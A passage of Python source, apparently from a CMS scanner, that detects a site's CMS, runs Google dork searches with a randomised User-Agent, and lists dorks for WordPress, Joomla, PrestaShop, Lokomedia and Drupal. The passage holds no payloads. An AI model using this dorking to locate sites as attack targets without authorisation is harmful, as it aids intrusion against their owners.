'en-US,en;q=0.5', 645 | 'Connection': 'keep-alive', 646 | } 647 | detect_cms() 648 | if dorks: 649 | headers = { 650 | 'host' : 'google.com', 651 | 'User-Agent' : random_UserAgent(), 652 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 653 | 'Accept-Language': 'en-US,en;q=0.5', 654 | 'Connection': 'keep-alive',} 655 | from modules.dorksEngine import Dorks as D 656 | D.searchengine(dorks,headers,output_dir,numberpage) 657 | if dorkslist == 'all': 658 | from modules.dorksEngine import DorkList as DL 659 | DL.dorkslist() 660 | if dorkslist == 'wordpress': 661 | from modules.dorksEngine import DorkList as DL 662 | DL.wp_dorkTable() 663 | if dorkslist == 'joomla': 664 | from modules.dorksEngine import DorkList as DL 665 | DL.joo_dorkTable() 666 | if dorkslist == 'prestashop': 667 | from modules.dorksEngine import DorkList as DL 668 | DL.ps_dorkTable() 669 | if dorkslist == 'lokomedia': 670 | from modules.dorksEngine import DorkList as DL 671 | DL.loko_dorkTable() 672 | if dorkslist == 'drupal': 673 | from modules.dorksEngine import DorkList as DL 674 | DL.dru_dorkTable() 675 | if cli: 676 | from cli import Cli 677 | cli = Cli() 678 | cli.send_commands("") --------------------------------------------------------------------------------